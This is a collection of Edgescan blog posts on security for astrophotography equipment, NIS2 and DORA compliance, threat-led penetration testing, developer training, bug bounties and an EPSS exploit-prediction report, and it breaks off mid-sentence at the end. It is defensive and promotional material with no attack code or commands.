cybersecurity relates to astrophotography and ways to safeguard your equipment, software, and data.Vulnerabilities in Popular Astrophotography SoftwareAstrophotography software like DeepSkyStacker and PixInsight are essential for processing and stacking images to reveal details hidden in the night sky. It's important to note that both programs, like any software, can have vulnerabilities. For example, DeepSkyStacker may require significant computational power and sometimes cloud storage. If not properly secured, this could expose your data to attackers. Downloading plugins or add-ons from unverified sources could lead to malware infections or unauthorized access to your system. Using outdated versions of any software, including software like PixInsight, could leave your system open to hackers that can use it to compromise your image data or corrupt your files.Automation in astrophotography also introduces risk. For instance, ASCOM drivers are commonly utilized to automate telescope control. Drivers that are outdated or misconfigured could allow for unauthorized access to your system, leaving your equipment open to remote manipulation. Tools like NINA (Nighttime Imaging 'N' Astronomy) can also present risks if network connections or remote access configurations are not secured.Securing Remote Observatories and Networked EquipmentAstrophotographers are using cutting-edge technology to capture stunning celestial photos from a distance. However, this digital revolution also comes with new risks. For instance, the ZWO ASIAIR is a game-changing device that enables access to the cosmos. While it has opened up exciting possibilities, it is crucial to ensure the security of your equipment. Changing factory-set passwords and using secure connections are vital to keeping your gear safe. Neglecting standard safety precautions could interrupt your photo sessions by bad actors exploiting vulnerable Wi-Fi setups or your easily guessed login details - "Password" is not a good password.Platforms like QHYCCD's software for QHY cameras, which often involves cloud storage, can be another weak point. Without proper security features such as two-factor authentication (2FA) or encryption, these systems are vulnerable to unauthorized access, resulting in the theft or manipulation of your imaging data, and no one wants that.Image Processing Tools: A Hidden Cyber RiskEven the tools astrophotographers use daily, like Adobe Lightroom and Affinity Photo, can have cybersecurity risks. Hackers have targeted Adobe's products in the past to exploit vulnerabilities and run malicious code. Are you keeping your software up to date? Every missed patch puts your computer at risk. Just imagine your entire photo library being locked by ransomware. Protect your work by making software updates a priority. When you see a notification, take the time to install the latest security fixes - your photos are worth it.Did you know that programs like PHD2, which guide telescopes for long-exposure imaging, might seem simple but can still pose security risks if they're part of your networked setup? If remote access tools aren't properly secured, attackers could take control of your equipment or mess with your imaging sessions.Best Practices for Protecting Your Astrophotography GearIt is essential to protect your astrophotography tools from cyber threats by adopting strong cybersecurity practices. Here are a few key steps you can take:Keep Software and Firmware Updated: Always install updates for your astrophotography software, camera, and telescope firmware as soon as they become available - these updates often include critical security patches to protect against vulnerabilities.Use Strong Passwords and Enable 2FA: Change default passwords on all devices, including remote observatories, telescopes, and cameras. Enable two-factor authentication (2FA) whenever possible to add an extra layer of security.Secure Network Connections: Using cloud services or remotely accessing your equipment, use encrypted connections (like VPNs) to protect your data from being intercepted.Download from Trusted Sources: Only download software, plugins, or updates from reputable sources to avoid inadvertently installing malware or compromised code.Conduct Regular Security Audits: Periodically audit your astrophotography setup, including checking for outdated software, weak network configurations, and other potential security gaps.It's important to understand the link between astrophotography and cybersecurity to make sure the technology you rely on to capture the universe stays secure. By safeguarding your equipment and data, you can focus on the stars without the worry of digital threats. ### What is the NIS2 Directive? The NIS2 Directive is a comprehensive legislation designed to enhance the EU's cybersecurity framework significantly. Its main goal is to strengthen the cybersecurity defences of critical infrastructure and essential services reliant on network and information systems. Building on the lessons from the original NIS Directive (2016), NIS2 broadens its focus to confront modern cyber threats and tackle emerging challenges. It specifically addresses the rapid advancements in cloud computing, supply chain security, and digital services, ensuring a more resilient and secure digital environment across the EU.Where Does NIS2 Apply?NIS2 not only expands within existing sectors (e.g., adding insurance companies to financial services, expanding energy to include district heating and cooling) but also introduces entirely new sectors like postal services, waste management, and food production etc.Here’s a breakdown of the sectors affected by the original NIS Directive compared to those included in NIS2, and the changes that have been introduced:What are the Requirements?What Needs to Be Done to Comply with NIS2?To strengthen Europe's defences against cyber threats, the NIS2 Directive introduces new obligations in four key areas: risk management, business continuity, reporting obligations and corporate accountability.Risk Management: Organizations must enforce robust measures such as incident response plans, supply chain security, network protection, stronger access control, and encryption to combat cyber threats.Business Continuity: Entities are required to ensure operational resilience, with plans for system recovery, crisis response, and emergency procedures during cyber incidents.Reporting Obligations: Essential and important entities must report major security incidents swiftly, including a mandatory 24-hour “early warning” for significant events.Corporate Accountability: NIS2 holds senior management directly accountable for cybersecurity, with penalties and personal liability for non-compliance. 10 Baseline Security MeasuresIn addition to the four key areas detailed above, NIS2 also mandates the implementation of 10 minimum security measures essential and important entities to counter common cyber threats:Conduct risk assessments and establish security policies for information systems.Implement policies to evaluate the effectiveness of security measures.Use cryptography and encryption where relevant.Create a plan for managing security incidents.Secure procurement, development, and operation of systems, including vulnerability handling.Provide cybersecurity training and ensure basic computer hygiene.Establish strict data access controls and track asset usage.Ensure up-to-date backups and maintain system access during incidents.Utilize multi-factor authentication, encryption for communications, and continuous authentication.Strengthen supply chain security by assessing supplier vulnerabilities and adopting appropriate security measures. How Can Edgescan Help with NIS2 Compliance?Edgescan, a leading provider of full-stack vulnerability management and penetration testing solutions, is perfectly positioned to assist organizations in achieving NIS2 compliance. Here’s how:1. Continuous Vulnerability Assessment: Edgescan provides continuous vulnerability scanning and assessment across both network infrastructure and application layers. This aligns with NIS2's requirement for organizations to regularly assess and mitigate risks.2. Risk-Based Prioritization: One of the key elements of NIS2 is risk management. Edgescan delivers a risk-based approach to vulnerability management by prioritizing vulnerabilities based on criticality, exploitability, and the business impact they might have.3. Full-Stack Security: From web applications to network infrastructure, Edgescan covers the entire IT environment, providing a comprehensive overview of all potential attack surfaces. This is crucial for NIS2 compliance, which requires organizations to ensure the security of both their digital and physical systems.4. Expert-Led Penetration Testing: Edgescan offers hybrid vulnerability management and expert-led penetration testing services, helping organizations uncover hidden vulnerabilities that automated scans might miss. This ensures a thorough assessment and meets the higher security standards demanded by NIS2.5. Compliance & Reporting Tools: Edgescan provides detailed reports that can assist organizations in demonstrating compliance with NIS2 during audits. These reports are essential for tracking progress, risk mitigation actions. ### The Power of Edgescan’s Validated Vulnerability Stream for Focused, Problem-Based Development Training When it comes to security training for developers, one size doesn’t fit all. You can send your teams to generic secure coding courses or throw random security guidelines at them, but is that really going to stick? Most developers I know are pragmatic problem-solvers. They thrive when you give them real, tangible issues to fix, not abstract rules to follow. And that’s where Edgescan’s validated vulnerability stream comes in—it turns security from theory into practice.   The Problem with Generic Security Training Let’s face it: traditional security training is often a bit of a grind. Developers sit through hours of presentations, learning about a long list of security vulnerabilities that may or may not be relevant to what they’re building. Sure, they might retain some of that information, but how much of it translates into their daily coding habits? When you bombard developers with a laundry list of potential threats, they don’t have the time or the context to apply that knowledge directly. In the fast-moving world of software development, training needs to be specific, problem-based, and integrated into the development cycle. Otherwise, it’s just noise.   Edgescan’s Validated Vulnerability Stream: Real-World Problems in Real Time Edgescan’s validated vulnerability stream is a game-changer because it delivers actual, verified security vulnerabilities that are impacting your own systems, in real-time. This is not some hypothetical security lesson; these are vulnerabilities you need to fix. The beauty of the Edgescan platform is its hybrid approach: vulnerabilities are identified through automated scanning, but then they’re validated by human experts before being sent to your team. That means developers aren’t wasting time chasing false positives or irrelevant issues. Every vulnerability in the stream is actionable, real, and relevant to your environment. This stream of validated vulnerabilities gives you a continuous, targeted feed of the exact problems that are affecting your codebase right now. And that’s where the opportunity for focused, problem-based development training comes in.   Focused Training: Turning Vulnerabilities into Learning Opportunities Imagine using this validated vulnerability stream to guide your development training efforts. Instead of generic lectures, you’re focusing on the exact security problems your team needs to address. You can structure training sessions around real-world issues that are specific to your applications, whether it’s an injection flaw, a misconfigured API, or an insecure file upload mechanism. Here’s how you can use the Edgescan stream for problem-based development training: Contextual Learning: Instead of teaching SQL injection in the abstract, walk through a SQL injection vulnerability that was discovered in your system. Show the team how it was identified, how it can be exploited, and—most importantly—how to fix it. This turns security from an academic exercise into a real-world problem-solving challenge. Immediate Feedback: With Edgescan’s continuous stream, you can integrate security feedback into your development process. As vulnerabilities are discovered and remediated, you can use them to reinforce secure coding practices on the spot. Developers see the impact of their work in real-time, which reinforces learning far better than a one-off training session. Focused Skill Development: Every developer or team has their strengths and weaknesses. The Edgescan stream allows you to identify areas where specific developers need more training. If a particular team struggles with API security, you can focus your training on the vulnerabilities discovered in that area. This helps build targeted expertise, rather than overwhelming the team with a broad spectrum of security concerns. Closing the Knowledge Gap: In many organizations, there’s a gap between security teams and development teams. Security folks find vulnerabilities, but developers are often left to figure out the fix on their own. The validated vulnerability stream bridges that gap. Security and development teams can collaborate on resolving these issues, using them as a basis for shared learning and better communication across departments. Tailored Training for Specific Technologies: Edgescan’s vulnerability insights are specific to the technologies you’re using. If your team is heavily invested in microservices, API security flaws might be more relevant. If you’re working in a legacy system, you might focus on patching out-of-date dependencies. By honing in on the actual technologies and frameworks in your stack, training becomes practical and directly applicable to your daily work.   Creating a Culture of Continuous Learning What excites me about this approach is that it turns security into an ongoing, iterative process. Edgescan’s validated vulnerability stream isn’t a one-off event. It’s a living, breathing resource that evolves with your codebase and development practices. You’re not just securing your system; you’re actively training your developers with each new vulnerability that arises. This creates a culture of continuous learning. Developers aren’t being sent to training sessions once a year—they’re getting security feedback embedded directly into their workflow. And because the vulnerabilities are real and relevant, the lessons learned stick far more effectively than they would in a traditional classroom setting.   The Path Forward We all know security isn’t static. The threats evolve, the code evolves, and training needs to evolve along with it. By leveraging Edgescan’s validated vulnerability stream, you can build a dynamic, focused training program that’s driven by the real-world issues your developers are already facing. It’s the perfect marriage of proactive security management and hands-on learning. Your developers aren’t just coding defensively—they’re building secure habits from the ground up, guided by real-time, validated vulnerabilities that matter to your business. That’s how we take developer security training from theory to practice—from broad lessons to focused, problem-based learning. And that’s how we create a more secure development culture that doesn’t just patch vulnerabilities but actively learns from them. ### How Edgescan Can Bolster Your Bug Bounty Program: Depth Meets Breadth and Frequency As someone deeply involved in security, I’ve seen firsthand how bug bounty programs can provide incredible insights into the depth of application security. Crowdsourced vulnerability hunting, when done right, can uncover highly complex and obscure issues that traditional methods may miss. But relying solely on bug bounty programs also has limitations, especially when it comes to comprehensive coverage and maintaining a consistent security posture. This is where the synergy between bug bounty programs and continuous vulnerability management solutions like Edgescan really shines.Bug Bounty for Depth: The Power of Focused ExpertiseBug bounty programs excel at finding the tricky, hard-to-spot vulnerabilities that require creative thinking and deep technical expertise. Talented researchers from all over the world will test your applications, often using unconventional approaches that can catch even the best internal security teams off-guard. For example, they might discover a business logic flaw buried deep in a multi-step transaction flow or an obscure deserialization vulnerability tucked away in an API.However, bug bounties are essentially snapshots in time, reactive by nature, and dependent on what the bounty hunters choose to test. They typically aren’t optimized for providing ongoing, exhaustive security coverage across an entire attack surface—especially at the speed of continuous development cycles.Edgescan for Breadth and Frequency: Continuous Coverage at ScaleThis is where Edgescan comes in. Edgescan doesn’t aim to replace bug bounty programs; instead, it complements them by covering the breadth and providing ongoing, real-time vulnerability management across your entire infrastructure. Whereas a bug bounty may dig deep into a specific component or application, Edgescan excels at providing broad, continuous visibility into your web applications, APIs, and networks. It’s always on, ensuring that nothing slips through the cracks between bounty submissions.One of the most significant advantages of Edgescan is its combination of automated vulnerability scanning with human validation. The platform continuously monitors your assets, scanning for a wide range of vulnerabilities, including those that may emerge as new CVEs are discovered or as your applications evolve. Importantly, each identified vulnerability is reviewed by security experts before being presented to your team, ensuring accuracy and removing the noise of false positives.This automated yet human-validated approach delivers frequent and thorough security checks—something that can be particularly difficult to achieve with a bug bounty program alone.Combining the Best of Both Worlds: Depth Meets BreadthWhen you integrate Edgescan with your bug bounty program, you get the best of both worlds. Bug bounty programs provide the deep dives needed to uncover complex, high-impact issues, while Edgescan ensures ongoing, comprehensive coverage across your entire attack surface. With Edgescan constantly monitoring and validating vulnerabilities, you can be confident that the more mundane, yet critical, security tasks are handled without over-reliance on sporadic bounty submissions.In fact, many organizations find that Edgescan’s continuous assessment actually enhances their bug bounty program. By proactively identifying and resolving the more straightforward vulnerabilities, Edgescan allows bounty hunters to focus on digging deeper, finding those truly high-value bugs that can have the most significant impact. Essentially, Edgescan frees up your bug bounty program to do what it does best—specialized, targeted, deep-dive security testing.Conclusion: A Holistic Approach to SecurityIn today’s fast-paced digital landscape, security needs to be both proactive and reactive. Bug bounty programs and continuous vulnerability management don’t have to be in competition—they can and should work together. Edgescan’s breadth and frequency fill the gaps left by a bug bounty’s depth, providing a holistic approach to security that maximizes coverage and minimizes risk.By leveraging Edgescan to handle the day-to-day security management and letting bug bounty hunters focus on digging into the tricky vulnerabilities, you’re building a more resilient, effective security posture. It’s not about choosing one over the other; it’s about combining their strengths to ensure you’re covered from every angle.So, if you’re running a bug bounty program or thinking about starting one, consider how Edgescan can bolster your efforts. Security is a journey, not a destination, and the best way to stay secure is to combine depth, breadth, and frequency in one cohesive strategy. ### Digital Operational Resilience Act (DORA) and Penetration Testing: An Overview by Edgescan IntroductionThe Digital Operational Resilience Act (DORA) was introduced across EU nations to address risk management gaps and attempt to harmonise these requirements across the EU. The act specifically targets financial service entities, i.e. largely those regulated by central banks, and introduces rules around incident management and reporting, digital testing and management of third-party risk.This document discusses the practical implications of DORA and what it means for your organisation, with a particular focus on one key element: Digital Operational Resilience Testing. This is the piece that includes requirements for establishing ongoing testing programmes. What is DORA?DORA (EU Regulation 2022/2554) was adopted by the European council in November 2022 and will be in full force from 17th January 2025. DORA is an EU regulation that comprehensively addresses ICT risk management in the financial sector by ensuring that all providers follow a set of standards to mitigate ICT risks for their operations. Prior to DORA different countries had different regulations and requirements when it came to ICT risk, whereas DORA aims to create a single framework that all EU member states will have to follow.After DORA's initial release, several clarifications on its practical implementation have been sought. Given this uncertainty about the legislation's day-to-day elements, various European authorities have produced a number of technical documents. The first batch of these was released in January 2024, in the form of three Regulatory Technical Standards (RTS) and one Implementing Technical Standard (ITS). These documents do not contain any information on resilience testing and focus on other key DORA areas.Five additional technical documents were published in July 2024. This set of documents included the much-anticipated “RTS on Threat Led Penetration Testing (TLPT)” (linked in references), which clarifies many aspects of resilience testing. Who does DORA apply to?DORA applies not only to traditional banks but also to other financial entities and ICT third parties that provide ICT-related services to financial institutions, such as cloud platforms or data analytics services.Affected entities include traditional financial institutions, credit and payment institutions, investment firms & funds, crypto-asset providers, data reporting service providers, insurance companies and ancillary service providers, pensions providers, auditors, and some ICT third-party service providers. Does DORA apply to US companies?As DORA is a regulation of the European Union, it only applies to organisations within the EU. So, strictly speaking, it does not apply to US companies. However, any US firms with legal entities operating out of the EU that meet the requirements for the scope above will be subject to its effects. DORA vs NIS2Another similar directive, which will become law across the EU in October 2024, is the Network & Information Security 2 (NIS2) directive. This directive is aimed at a wider range of organisations and attempts to harmonise more broad levels of cyber security in the EU.DORA is specifically focused on the financial services sector and will take precedence over any overlapping regulatory texts such as NIS2.While similar, their purposes differ—DORA protects the financial sector, while NIS2 creates a cyber security base across a broader set of industries. DORA Key ElementsDORA really breaks down into six crucial elements, as summarised below:ICT Risk ManagementICT Incidents Management & ReportingOperational/Security Payment Incident Management & ReportingDIGITAL OPERATIONAL RESILIENCE TESTINGInformation & Intelligence SharingICT Third-Party Risk ManagementThe pillar ‘Digital Operational Resilience Testing’ is where Edgescan comes into the picture. This element is the focus of the rest of this document. DORA Testing Requirements:Digital Operational Resilience TestingDigital Operational Resilience Testing is outlined in Articles 24, 25, 26 and 27 of the act, with further clarifications in the RTS on TLPT.The act defines two key requirements: the notion of ‘testing’ and ‘advanced testing’.Testing ScopeThe target of these tests is on all ICT services that support critical or important functions of financial institutions.DORA defines a critical or important function as “a function, the disruption of which would materially impair the financial performance of a financial entity, or the soundness or continuity of its services and activities, or the discontinued, defective or failed performance of that function would materially impair the continuing compliance of a financial entity with the conditions and obligations of its authorisation, or with its other obligations under applicable financial services law.”Requirement 1: Resilience TestingGoalImprove security posture and thus organisational resilienceScopeCritical and important applications, systems and infrastructureFrequencyAt least annually, ongoing or before deploymentsTestersInternal or externalAs part of the ICT risk management framework, DORA requires that financial entities define, document and maintain a thorough and comprehensive digital operational resilience testing programme. Financial entities will need to ensure that appropriate tests are conducted on all ICT systems and applications supporting critical or important functions and must do so on at least a yearly basis.Some of the testing types that are detailed include:Penetration TestingRegular (at least annual) testing of applications, API’s and infrastructureVulnerability AssessmentsPerforming regular vulnerability scanning of networks and applications.Testing should be also carried out before any deployment/redeployment of new or existing applications or infrastructure components that support critical or important functionsSource Code ReviewsSource code reviews are undertaken regularly for critical or important systemsObjective-based penetration testingAkin to Red Teaming, a more focused penetration test, usually comprising of a wider range of systems, but with objectives defined in advance (i.e. flags).Organisations will need to:Demonstrate that they are conducting an appropriate set of security testing on critical and important systems and applications at least annually‘Fully address’ any vulnerabilities identified by this testingThere are still some elements of ambiguity in the above requirements, such as what defines appropriate set of testing. Organisations will need to work closely with their authorities to ensure the right level of testing is established on the correct set of systems.Edgescan Insight: Penetration testing and vulnerability management is core to what we do at Edgescan. We deliver thousands of assessments every year to Fortune 100 clients globally in the EU and the USA. We have a wide range of licencing available which covers continuous security testing and exposure management (for applications and networks), working up to more rigorous penetration testing licences (Penetration Testing as a Service).Additionally, objective-based penetration testing (aka red teaming) and source code reviews are a capability that we have been exercising for over 10 years / since 2011.Requirement 2: Threat-Led Penetration Testing (TLPT)Article 26 of DORA sets out expectations in relation to the advanced testing of ICT tools, systems and processes, by way of the Threat Led Penetration Test (TLPT).GoalValidate the effectiveness of the ongoing resilience testing programmeScopeOrganisation-wide: People, processes, technologyFrequencyEvery three yearsTestersInternal (with some caveats) or ExternalDesignated significant entities (see below), must conduct a Threat-Led Penetration Test (TLPT) at least once every three years. The goal is to validate the effectiveness of the ongoing resilience testing, that each organisation is conducting. As this is a three-year requirement, it is likely that the first of these tests will not take place until closer to or during 2027. The TLPT framework being used is largely based on the TIBER-EU framework for red teaming, however a number of modifications have been made.What is a TLPTConventional penetration tests provide a detailed assessment of technical and configuration vulnerabilities which are usually focused on a single system or environment in isolation. A TLPT is more akin to a traditional (albeit much larger) red team test, which focus on the entire organisational entity, including its people, processes and technologies. Additionally a TLPT is ‘intelligence-led’, which means that the testing team, works closely together with a Threat Intelligence provider, to establish a set of testing scenarios based on known current attacks and industry-specific attacks.TLPT AuthorityEach EU member state will designate an authority who is charged with all tasks and responsibilities related to TLPT being conducted in that state. The TLPT Authority will work with each organisation proactively, identifying those who must undergo a TLPT, initiating the testing process, confirming the scope of testing, confirming reporting requirements and ultimately signing off on the work completed.Even though these Authorities are working from the same set of legislation, there will however likely be small differences between how TLTP’s are carried out in each state.Criteria – Significant EntitiesThe technical standards recognise that TLPT will apply to certain organisations based on ICT maturity and overall importance of that entity. The below areas will be factors of that decision:Impact-related factors: to what extent a disruption of the financial entity would impact the financial sector.Possible financial stability concerns: for example, the systemic character of the financial entity at EU or national level.Specific ICT risk profile: level of ICT maturity of the financial entity or the technology features involved.The above criteria have been tested to ensure that only the biggest and most appropriate financial entities will become subject to TLPT requirements. Indeed, a specific set of financial criteria have been clarified and established in the RTS on TLPT (Article 2)The TLPT Authority will inform the financial entities if they are required to undergo a TLPT. Given the extent of the undertaking, we would expect the TLPT Authority to provide ample notice to relevant organisations where this will apply. Once this is known, the TLPT Authority will provide three months notice to begin the actual preparation phase of the test.TLPT Authority: This is a government authority which operates at the jurisdiction level. They will appoint individuals (a Test Manager and TLPT Cyber Team [TCT]) who will work with the financial entity in planning the TLPT and will be the ultimate audience for the test results and final reports.Financial Entity - A number of roles exist:Control Team: This consists of a control team lead who coordinates all activities within the organisation. The rest of the control team should consist of any other individuals who will help coordinate the overall test. This will be the only team within the organisation that will be aware of all aspects of the TLPT and will need to exercise a high degree of secrecy.Blue Team: These are the defenders within the organisation. During the testing phases of the TLPT, the blue team will not be aware that the TLPT is taking place. However for final reporting, the blue team’s input will be required, to match up against the red teaming activities (i.e. to see if certain attacks were detected and/or blocked etc).Threat Intelligence Provider: Third party provider for the threat intelligence activities. These will produce a set of test scenarios based on known current attacks and industry-specific attacks. These scenarios will be presented to the Red Team Provider for execution.Red Team: Third party provider for the red teaming and actual testing activities. In the context of a TLPT, this would be Edgescan. See below for more details on the testing process.Internal testers: The latest RTS clarifications now allow for the use of internal testers as part of a TLPT (see note below). What does a TLPT look like in practice?Testing ProcessThis largely follows the TIBER-EU process which is broken into standard phases of preparation, testing and closure. Rather than go into the full TLPT process, we will only highlight some of the important aspects to consider.It should be noted however, that a TLPT will be a significant undertaking, in comparison to standard ‘business as usual’ penetration tests.Preparation Phase: The control team is formed, scoping takes place, the Threat Intelligence and Red Team Provers are selected by the financial entity. The high-level scope of the test is signed off by the TLPT Authority and this is shared with the external Threat Intelligence and Red Team Providers. The control team must consult with the TLPT Authority on their risk assessments or measures, which have been identified, before any testing begins.Testing Phase – This is comprised of three parts:Threat Intelligence Provider: This is where the scenarios which are to be tested are produced, based on real world threats with an appropriate provider. This provider should cover both the targets and threats relevant to the organisation being tested. At least three scenarios devised by the Threat Intelligence provider are chosen by the control team and will form the basis of the red team tests. The scenarios and plans all need approval by the TLTP Authority before actual testing. This process will likely last about four weeks. Edgescan will work closely with the Threat Intelligence provider.Red Team Test Plan: The Red Team provider (e.g. Edgescan) will prepare the test plan, according to the requirements laid down in the RTS for TLPT (Annex IV), which includes information on:• Communication channels• Tactics and techniques allowed and prohibited• Risk management measures• Detailed descriptions, plans and timelines for each test scenarioActive Red Team Testing: This phase must take place over a minimum of 12 weeks, to allow for testers to mimic ‘stealthy’ threat actors. TLPTs are ultimately a covert exercise and an element of secrecy around testing activities must be maintained. The exact duration of this phase will be fine-tuned in agreement with the TLTP Authority. The Red Team must be comprised of a red team manager and at least two other red team testers. This is obviously a large and expensive undertaking and one that will evolve and take shape over the coming years. Some further guidance on the exact requirements and shape of these tests will come from the TLPT Authority within each jurisdiction. During this phase, a range of tactics and techniques are employed, such as:Reconnaissance: Collecting as much information as possible on a targetWeaponization: Analysing information on the infrastructure, facilities and employees and preparing for the operations specific to the targetDelivery: The active launch of the full operation on the targetExploitation: Compromising the networks, servers, applications of the financial entitle and exploiting its staff through techniques such as social engineeringControl & Movement: Attempts to move from one compromised system to further vulnerable or high value ones – also known as pivoting or lateral movement.‘Leg-ups’ can also be used during testing – this is where some extra help by the organisation is provided, such as additional access or information, in order to remove a testing blocker to facilitate continuation of testing. These are, of course, documented as such.Closure Phase: Only during this phase is the actual TLPT revealed to the blue team. Initial draft reports are prepared by the Red Team for review by the control team.The blue and red teams must also come together no later than 10 weeks after the end of red team testing phase. This is in order to replay relevant actions and defences that were carried out during the test and is known as a purple teaming exercise (see note below), which is now mandatory.This phase also includes reporting by the red team, identification of any weaknesses, the attack paths, flags obtained and any other relevant technical data. Additionally, blue team reports are also prepared at this stage.Finally a test summary report and any remediation plans, will be shared with the TLPT Authority for review and sign off.Lastly there is also a cleanup phase which includes the secure deletion of data that may have been collected during testing and removal of any ‘testing artifacts’.Purple TeamingThe red team (representing attackers) and blue team (representing defenders), working together collaboratively are known as purple teaming. Purple teaming is now mandatory in the closure phase of a TLPT.Internal TestersThis area is one of the key differences introduced by DORA versus the TIBER-EU framework and allows for the use of internal testers, with a few stipulations. For example they should be independent, suitably experienced and their use must not negatively impact the organisation (e.g. by taking them away from other work duties). To qualify, they must also have worked at the organisation for at least one year (this requirement was eased in the last RTS). It also states that every third TLPT tests should include the use of external testers, i.e. using external testers at least once in a nine year period. The full requirements for internal testers can be found in the RTS for TLPT Article 13.Tester RequirementsRequirements for the testers who can conduct TLPT is laid out in Article 27 of DORA and also with further clarification in the RTS for TLPT Article 5. These are similar to those requirements in the TIBER-EU framework, with some modifications.The recent RTS document provided, has given some clarification on the initially strict minimum requirements for those conducting TLPT. The main factor which has changed, removes the chicken and egg scenario, whereby originally those conducting TLPT must have prior experience in conducting a TLPT. The requirement has been widened now to include more practical, prior experience in ‘penetration testing and red teaming’.Given the strict requirements, the update includes provisions that the possibility that financial entities can procure providers who do not comply with some of the requirements, provided they mitigate any additional risk that may be introduced.Testing References: The Red Team Provider must provide at least five references from previous assignments related to penetration testing and red team testing.Insurance requirements: The Red Team and Threat Intelligence Providers must show adequate insurance provisions for professional indemnity and cover for risks of misconduct and negligence.Red Team Manager: There must be at least one, who can demonstrate at least five years of experience in penetration testing and red team testing.Red Team Members: There must be at least two other testers, each with penetration testing and red team testing experience of at least two years.Additionally, the Red Team Manager and Testers must have a combined participation in at least five previous assignments related to penetration testing and red team testing.Finally, testers should be free of conflict of interest, for example by providing services to or being employed by a provider that performs blue team tasks for an organisation which is part of this TLPT.Joint or pooled testsDORA includes a provision where many financial entities can come together and participate in a joint TLPT, with shared testing providers. These will allow for organisations that use the same ICT providers to undergo tests as a group. This accounts for different organisations that might be part of a wider group structure and to facilitate joined-up tests. These types of tests will likely require extra planning and management overhead.Edgescan Insight: While the requirements around TLPT’s are now clearer, the practical execution of these tests will not happen for some time, likely starting in 2027. As we progress through the start of 2025, we should continue to receive further clarity from each Authority and will continue to provide updates around DORA on our blog.We will be positioned to execute the testing required during a TLPT when this requirement needs to be executed (estimated closer to 2027) and we will work closely with several Threat Intelligence providers to help our clients complete this requirement. The DORA Journey16 January 2023: DORA entered into force17 January 2024: Batch 1 of RTS and ITS technical standards released17 June 2024: Batch 2 of RTS and ITS technical standards released17 January 2025: DORA and technical standards (RTS & ITS) applyLate 2026 / Early 2027: First TLPTs will start What is TIBER-EU?TIBER-EU is a European framework for conducting threat intelligence based red-teaming tests, which was introduced in 2018. It outlines the tactics, techniques and procedures (TTPs) that should be employed during testing, based on bespoke threat intelligence.TIBER-EU brings together a number of entities within organisations themselves and outlines third party providers that are required to carry out the red-team capability and the threat intelligence capability. These providers work together with the organisation to conduct testing. How We Can Help - Get in touch!Testing, Reporting and RemediationThe most relevant part of DORA, is centred on resilience testing, which is mandating annual penetration testing for critical applications and systems. This is where Edgescan can help.Penetration TestingThe good news is that most of the types of testing required by the standard are items that financial services organisations will be well familiar with and indeed, the majority of which will already have ongoing secure testing programmes that include these items. Once organisations identify their critical systems in scope, we can onboard them and start testing immediately.We already provide world class penetration testing services globally, via our platform in the form of Penetration Testing as a Service (PTaaS). Our testing methodology more than meets the current criteria to cover the annual tests that are highlighted in DORA.Extensive reporting via the platform, gives you an ongoing view of the security posture for your critical assets, with extensive reporting metrics and on-demand retesting.Plus with remediation advice direct from our technical testing teams, demonstrating that any vulnerabilities identified have been remediated sufficiently and retested satisfactorily, will not be a problem.Threat-Led Penetration TestingWe do already provide objective-based penetration testing (aka Red Teaming) capabilities using our skilled and experienced teams. The goal of standard penetration testing is to find ‘all the vulnerabilities’ that an adversary could leverage to breach a system or organisation. Red Teaming can be thought of as a narrow-scope penetration test, whereby you focus on an objective or end goal and leverage vulnerabilities to achieve this objective.We will continue to keep a close eye on upcoming announcements from the ESAs and will issue further updates on our blog (link) for any official communication in relation to DORA.If you are curious about our ongoing resilience testing or indeed any other aspect of TLTP or objective-based testing, please contact our sales team at sales@edgescan.com.ReferencesDigital Operational Resilience ActDORA RTS on TLPTCentral Bank of Ireland – DORAEuropean Central Bank – TIBER-EU FrameworkUseful AcronymsDORA: Digital Operational Resilience ActECB: European Central BankEBA: European Banking AuthorityESMA: European Securities and Markets AuthorityEIOPA: European Insurance and Occupational Pensions AuthorityESA:  European Supervisory Authority (comprises of EBA, EIOPA, ESMA)ITS: Implementing Technical StandardsNIS2: Network & Information Security 2 DirectivePTaaS: Penetration Testing as a ServiceRTS: Regulatory Technical StandardsTCT: TLPT Cyber TeamTIBER-EU: Threat Intelligence-Based Ethical Red teaming (EU)TLPT: Thread-Led Penetration TestingTTP: Tactics, Techniques, and Procedures ### Shedding Light on Exploit Prediction Edgescan Partners with FIRST.org and Cyentia At Edgescan, we constantly seek ways to enhance our vulnerability management capabilities and provide our clients with the most effective security insights. We're proud to have partnered with FIRST.org and Cyentia Institute on their groundbreaking report, "A Visual Exploration of Exploitation in the Wild." This comprehensive study delves into the performance of the Exploit Prediction Scoring System (EPSS) and offers valuable insights into vulnerability exploitation patterns. Understanding EPSS and Its Importance EPSS is a data-driven system designed to estimate the likelihood that a published vulnerability will be exploited in the wild. As the security landscape evolves, tools like EPSS become increasingly crucial for effectively prioritizing remediation efforts. The report provides an in-depth analysis of EPSS performance and compares it to other popular vulnerability scoring systems. Key Findings from the Report Exploitation Patterns The study reveals that exploitation activity is far from static. While nearly 14,000 vulnerabilities have evidence of exploitation, only about 10,000 had observed activity in 2023. This highlights the importance of continuously monitoring and reassessing vulnerability risks. EPSS Performance Each successive version of EPSS has shown improved performance in predicting exploitation. The latest version demonstrates strong results across a range of scores, offering organizations the flexibility to tailor their remediation strategies based on risk tolerance and capabilities. Comparison with CVSS Compared to the Common Vulnerability Scoring System (CVSS), EPSS performs better in predicting exploitation. For equivalent levels of effort, EPSS achieves almost 3x more coverage and over twice the efficiency of CVSS. Widespread Exploitation is Rare Interestingly the report found that widespread exploitation across organizations is uncommon. Half of all known exploited CVEs are never observed by more than 0.02% of organizations. This underscores the need for context when assessing exploitation reports. Implications for Vulnerability Management These findings have significant implications for how we approach vulnerability management: Dynamic Prioritization: The fluctuating nature of exploitation activity emphasizes the need for dynamic, data-driven prioritization strategies Balancing Act: Using EPSS for remediation prioritization requires balancing coverage, efficiency, and effort based on an organization's specific risk profile and resources. Context Matters: Not all "exploited in the wild" reports are equal. It's crucial to consider the scope and prevalence of exploitation when assessing risks. Long-Term Vigilance: While new vulnerabilities often grab headlines, the data shows that attackers continue to target older vulnerabilities. This highlights the importance of maintaining comprehensive, long-term vulnerability management programs. How Edgescan Leverages These Insights At Edgescan, we're committed to incorporating these valuable insights into our vulnerability management solutions. By integrating EPSS scores and considering the patterns revealed in this study, we can offer our clients even more refined and effective prioritization strategies. We're exploring ways to: Incorporate EPSS scores into our risk scoring algorithms, providing a more nuanced view of exploitation likelihood. Develop dynamic dashboards that reflect the changing nature of exploitation activity over time. Offer customizable prioritization thresholds based on individual client risk tolerances and resource capabilities. Provide context-rich reporting beyond binary "exploited/not exploited" classifications. Looking Ahead The "Visual Exploration of Exploitation in the Wild" report offers a wealth of insights that will shape the future of 